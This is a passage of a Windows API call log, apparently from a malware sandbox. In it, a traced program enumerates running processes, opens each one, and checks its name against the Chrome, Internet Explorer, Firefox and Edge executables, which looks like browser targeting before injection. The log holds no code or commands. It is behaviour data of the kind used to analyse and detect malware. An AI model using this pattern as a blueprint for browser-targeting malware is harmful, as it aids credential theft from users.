	[0236.295] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x77a0
	[0236.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.295] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.296] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.296] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.296] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x77a4
	[0236.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.298] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.298] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.298] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.299] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.299] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x77a8
	[0236.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.300] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.301] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.301] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.301] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x77ac
	[0236.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.303] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.303] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.303] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.304] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x77b0
	[0236.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.305] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.306] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.306] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.307] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.307] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0236.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x77b4
	[0236.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.308] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0236.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.308] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.309] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0236.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.309] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.310] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x77b8
	[0236.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.311] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.312] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.312] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.313] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.313] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0236.314] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x77bc
	[0236.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.314] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.314] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.314] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.315] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.315] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0236.316] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x77c0
	[0236.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.316] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0236.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.316] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.317] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0236.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.317] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.317] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.318] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x77c4
	[0236.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.318] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.319] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.319] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.319] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.320] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0236.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x77c8
	[0236.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.321] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0236.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.321] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.321] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0236.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.322] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.322] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0236.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x77cc
	[0236.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.323] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0236.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.323] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.324] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0236.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.324] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0236.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x77d0
	[0236.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.326] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0236.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.326] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.327] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0236.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.327] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.327] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0236.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x77d4
	[0236.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.328] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0236.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.328] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.329] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0236.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.329] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.329] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0236.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0236.330] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0236.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x77d8
	[0236.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.331] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0236.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.332] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.332] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0236.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.333] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.334] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0236.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x77dc
	[0236.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.335] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0236.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.335] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.335] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0236.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.336] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.336] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0236.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x77e0
	[0236.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.337] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0236.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.337] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.338] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0236.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.338] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.338] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0236.339] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x77e4
	[0236.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.339] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0236.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.339] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.340] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0236.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.340] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.342] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0236.342] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x77e8
	[0236.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.343] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0236.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.343] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.344] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0236.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.344] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.345] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0236.346] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x77ec
	[0236.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.346] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0236.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.346] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.346] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0236.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.347] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.347] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0236.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x77f0
	[0236.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.348] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0236.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.348] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.349] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0236.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.349] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0236.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x77f4
	[0236.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.350] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0236.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.351] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.351] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0236.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.352] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.352] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0236.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x77f8
	[0236.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.353] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0236.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.353] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.354] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0236.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.354] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0236.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x77fc
	[0236.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.355] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0236.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.355] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.356] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0236.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.356] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0236.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7804
